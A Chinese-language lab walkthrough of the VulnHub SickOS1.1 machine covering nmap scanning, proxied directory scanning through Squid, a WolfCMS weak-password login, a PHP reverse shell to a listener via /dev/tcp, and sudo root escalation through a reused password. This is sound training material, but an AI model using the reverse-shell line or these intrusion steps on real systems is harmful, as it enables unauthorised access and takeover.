红队笔记3-SickOS1.1打靶流程解法1-穿越Squid代理的CMS渗透（vulnhub）

目录

开头:

1nmap利用-主机发现&端口扫描

2.攻击优先级分析：

3.3128端口-squid代理访问web

4.提权-文件泄露密码信息

5.总结：

---

开头:

学习的视频是哔哩哔哩红队笔记：

「红队笔记」靶机精讲：SickOS1.1 - 穿越Squid代理的CMS渗透_哔哩哔哩_bilibili

打靶时参考文章和本文借鉴文章：

红队打靶：SickOS1.1详细打靶思路（vulnhub）-CSDN博客

靶机下载链接见：

https://download.vulnhub.com/sickos/sick0s1.1.7z

1nmap利用-主机发现&端口扫描

Sudo nmap -sn 192.168.254.0/24
sudo nmap -min-rate 10000 -p- 192.168.254.143
sudo nmap -sT -sV -sC -O -p22.3128,8080 192.168.254.143
sudo nmap -sU -p22,3128,8080 192.168.254.143
Sudo nmap –scritp=vuln -p22,3128,8080 192.168.254.143
端口扫描4种形式，不知道含义的可以看我的第一期

通过nmap端口扫描，我们获得了以下信息：

1,开发了22 ，3128（squid-http） ，8080(http-proxy),其中squid-http（squid/3.1.19）不清楚具体功能，但是通过http猜测应该也是应该web相关的服务，但是8080处于关闭状态。

既然对squid-http不清楚，那就上网查：

squid/3.1.19到底是个什么东西？

squid是个代理服务器，客户端要通过代理才能访问web,我们知道这是个是，什么东西就行了

2.攻击优先级分析：

1.3128端口：一个代理服务器的端口号，先打开看看

2.8080端口：和80端口一样，通常部署了web，之所以拍后，因为处于关闭状态

3.22端口:没什么利用点,漏洞少

3.3128端口-squid代理访问web

3128：

可以看到访问3128页面显示error但这是网站自带的报错信息，说明是存在网站的，只是我们访问手法是错误的（因为是squid代理服务器，我们需要通过代理访问）

8080：

访问8080,就是单纯的没有找到

我们先尝试一下目录扫描能否扫描到东西

sudo gobuster dir -u http://192.168.254.143 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

gobuster显示我无法连接上http://192.168.254.143:3128  无法继续扫描下去(可能导致这样的原因 防火墙(waf)，代理阻断了)

Dirb http://192.168.254.143:3128

Dirb 也啥也扫描不出来，使用Dirb参数挂代理扫描

​
dirb http://192.168.254.143/ -p http://192.168.254.143:3128/

​

-p 使用代理

我们以http://192.168.254.143:3128/这个为代理，访问http://192.168.254.143/网站（为什么是80嘞。我们也没扫到80端口啊，因为使用squid拦截了nmap的流量，所有扫描不出来，但是以通常思维，web都是部署在80端口上的）

成功！扫描出了一些路径，我们可以尝试访问一下，重点访问状态码是200的（访问也要在浏览器中挂代理）

其中cgi-bin(解法2中的，看见这种，要去想到用nikto扫描，能不能暴露出一些常见的漏洞，我会在下一篇文章中讲解)

浏览器挂代理

设置好代理后再去访问（就是浏览器的数据包要先去192.168.254.143：3128，再通过转发到web,web返回的数据包同理也是通过3128端口返回到我们浏览器）

成功显示，之后我们再去看哪些扫描出来的目录

Robots显示了一个目录 wolfCMS

 

其他都没有什么价值

现在我们梳理一些我们的资源：

1. 发现一个可下载的py文件
2. 一个wolfCMS
3. 所以我们可以先去看看py文件里面的内容，感觉还是CMS更有价值

connect文件 ：

这句话 “我试着非常频繁地连接事物n，您可能想尝试我的服务”频繁  让我想到了定时任务，但是还没有拿到shell,定时任务只有等会再看了

WolfCMS：

这又是一个网页CMS，如何利用嘞：

1.网上搜索关键词（找后台，找漏洞）

2.找特殊功能，可以执行代码，上传后门

根据上网查找的结果，我们可以知道这个CMS有个后台存在漏洞，我们去找后台路径

http://192.168.254.143/wolfcms/?/admin/login 

我们找到了后台路径，这里存在登录，现在又该思考如何登录：‘

1.上网查询，默认账号密码

2弱口令Username：admin/administrator/root  Password：admin/password/passwd/123456

3爆破 

4.漏洞（未授权/sql注入万能密码)

弱口令进入了账号：admin:密码;admin

进入后台

1.观察功能，写入代码，文件上传，添加插件等功能

2.上网查询相关漏洞

 

这里貌似能执行php代码，这就简单了，直接用PHP写反弹shell

这里是能对页面的html的header 进行修改，进行进行XSS跨站，但是这里对获得shell帮助不大

上传文件，上传后门，不用多说了，这个后台，有很多利用点，依次尝试，看看是否存在漏洞

我们尝试在articles页面php脚本中添加反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.254.128/443 0>&1'"); ?>

点击articles页面，反弹shell成功

4.提权-文件泄露密码信息

ip a 
whoami
id
unema -a

Ip地址正确，www-data（通常是与网站相关的功能）用户权限比较低  Ubuntu 名字叫sickos

我们已经拿到初步立足点

可以看到ls下有很多文件，其中我们比较关系的是config.php文件这一看就是和配置相关的文件，很有可能暴露密匙

数据库的密码

我们再看一下/etc/passwd文件

尝试用刚才获取的密码等sickos用户ssh

成功！！！！（还没有利用到定时任务嘞）

看看当前用户的权限信息

ip a
whoami
id
uname -a

是目标主机，权限比较高，可以使用sudo

那么接下来就是提权了

Sudo -l 查看当前用户提权

三个ALL sickos用户用户最高权限

Sudo /bin/bash

开启一个新的root绘画                                            

提权成功：

进入root目录获取flag

如果你正在看这个！！

您已成功完成 SickOS1.1。

感谢您的尝试

5.总结：

1.端口扫描：发现存活端口：22 ，3128（squid-http） ，8080，其中squid-http是个代理服务器

2.开始访问3128，8080都访问不到，目录扫描也扫描不出结果，根据我们知道squid是个代理服务器，尝试Dirb -p参数，挂代理目录爆破，成功扫出来一些路径。然后浏览器设置代理访问，找到了wolfcms的页面。

3.通过浏览器获得wolfcms后台路径，通过弱口令登录后台，寻找后台代码执行和文件上传的位置，构造反弹命令写入代码执行，反弹shell

4.获得初步立足点，尝试提权，查找凭据敏感信息。查看www-data的权限，发现需要密码，我们不知，尝试查看当前目录，发现有一个config.php，里面有数据库的账号和密码，密码为join@123 ，查看/etc/passwd， 发现了sickos这个账户拥有/bin/bash环境，很可能是个有效用户。猜测数据库和ssh登录账户公用相同的密码，成功ssh登录了sickos的账户。

5.发现已经是三个ALL的权限，直接运行sudo /bin/bash即可拿到最高权限

 通过靶场我学习到了：

1.squid 代理服务器，只要通过代理才能访问到目标服务器的web

2.dirb -p 挂代理目录扫描

3.最后提权的时候，配置文件泄露了数据库的密码，而这个密码又恰巧就是用户sickos的密码，感觉也有点凑巧。

不够据红队笔记大佬讲，渗透过程就是要做很多尝试，有些时候看似是偶然，实际发生的概论也不低，这是因为可能运维人员图省事或者配置没来得及修改。也启发我们，不要使用默认密码和弱口令，不要把数据库密码也作为用户密码。

解法2：再下一篇文章中，将采用shellshock漏洞对sickos靶机进行渗透